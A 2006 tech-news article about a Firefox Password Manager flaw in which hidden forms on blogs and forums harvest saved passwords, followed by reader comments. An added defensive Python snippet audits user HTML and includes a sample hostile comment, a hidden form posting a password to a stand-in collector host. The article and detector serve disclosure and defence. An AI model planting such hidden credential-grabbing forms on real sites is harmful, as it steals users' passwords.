Welcome to P2PNET.net - The original daily p2p and digital news site. Always First!

Firefox password security hole

p2pnet.net News:- Are you one of those people who lets Firefox save your passwords so you don’t have to type them in again?

That might not be such a good idea, Robert Chapin tells p2pnet.

That’s because he’s found a new security hole in the Mozilla Firefox web browser he’s calling a Reverse Cross-Site Request (RCSR).

The vulnerability exposes saved passwords and could affect anyone visiting a weblog or forum website that allows user-contributed HTML codes to be added, says Chapin, who runs Chapin Information Services.

"RCSR attacks are also actively targeting Microsoft Internet Explorer, however a flaw in Firefox makes the attack much more likely to succeed," says Chapin on his site.

"The Password Manager component of Firefox can be exploited to send a username and password combination to an attacker’s computer without the user’s knowledge. Users of both Firefox and Internet Explorer need to be aware that their information can be stolen in this way when visiting blog and forum websites at trusted addresses.

"A recent large-scale attack using RCSR targeted MySpace.com users and was first reported by Netcraft 10/27/2006. That incident involved fake login forms on the MySpace website inviting users to type in their username and password."

A recent large-scale RCSR attack targeting MySpace.com involved fake login forms on the MySpace website inviting users to type in their username and password.

Chapin says the problem is made worse by the fact that forms can be completely hidden from view.

After saving a website password in Firefox, it’s possible for that password to be transmitted to another website by unwittingly clicking on an invisible image link, he says, adding:

"Mozilla confirmed this as bug number 360493, and said they are already working on a fix for version 2.0.0.1 or 2.0.0.2."

A proof-of-concept demonstration is available here.

Chapin recently reported on a MySpace vulnerability which allowed music files to be downloaded anonymously and identified a gaping hole in Yahoo’s music sales site.
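The attack described above depends on forms placed in user-contributed HTML, so one check a blog or forum operator could run on a submission before publishing it is sketched here. This is an added example, not code from Chapin or Mozilla; the function names, the `forum.example` and `collector.example` hosts and the sample comments are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class FormAudit(HTMLParser):
    """Collects findings about form markup in user-contributed HTML."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.in_form = False
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases names; valueless attributes arrive as None.
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.in_form = True
            # Relative actions have no hostname and stay on this site.
            host = (urlparse(a.get("action", "").strip()).hostname or "").lower()
            if host and host != self.site_host:
                self.findings.append("form posts off-site to " + host)
        elif tag == "input" and a.get("type", "").lower() == "password":
            # Flag regardless of styling: the form may be hidden from view.
            where = "inside a form" if self.in_form else "outside any form"
            self.findings.append("password field " + where)

    def handle_endtag(self, tag):
        if tag == "form":
            self.in_form = False

def audit_user_html(html, site_host):
    """Return reasons to reject a submission (empty list means none found)."""
    parser = FormAudit(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample submissions, not taken from any real site.
SAMPLE_COMMENT = ('<p>Nice post!</p><form action="https://collector.example/c" '
                  'style="display:none"><input name="user">'
                  '<input type="password" name="pass"></form>')
SAMPLE_CLEAN = '<p>See <a href="https://forum.example/faq">the FAQ</a>.</p>'

if __name__ == "__main__":
    for sample in (SAMPLE_COMMENT, SAMPLE_CLEAN):
        print(audit_user_html(sample, "forum.example") or "no findings")
```

A site that accepts user HTML would normally go further and strip form-related tags outright with an allowlist sanitizer; the audit only shows what to look for.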

Also See:
MySpace vulnerability: MySpace download hack, October 17, 2006
Gaping hole: Yahoo Music Unlimited hack, May 30, 2005



8 Responses to “Firefox password security hole”

  1. Reader's Write Says:

    Note: you do not have to click on an image or submit a form from the exploit page for the payload to operate here.

    Example: http://sysadminco.com/vuln/

  2. Reader's Write Says:

    The exploit didn’t work on my Swiftfox/Ubuntu Edgy configuration, no matter how hard I tried.

  3. Reader's Write Says:

    Sorry, it works. I just needed to disable the NoScript extension and the pop-up blocker, and to press “remember” for the login data.

  4. Reader's Write Says:

    Nothing new, we already knew Firefox was insecure:

    http://www.FirefoxMyths.com

  5. Reader's Write Says:

    Internet Explorer 7 has the same bug.

    info:
    http://mentedigitale.altervista.org/phpBB2/viewtopic.php?t=277&sid=44bd33c86014092acdc45de88a866fbf

    Info:
    http://www.techtree.com/India/News/IE_7_Less_Vulnerable_than_Firefox_2/551-77396-643.html

    By WebDataBank

  8. clifton Says:

    If I were worried about security I wouldn’t want my passwords sitting there in plain text for anyone who sits down at my computer. What a crock. Check this warning out.

    http://foxsys.blogspot.com/2008/07/firefox-3-saved-password-security.html

    firefox password security
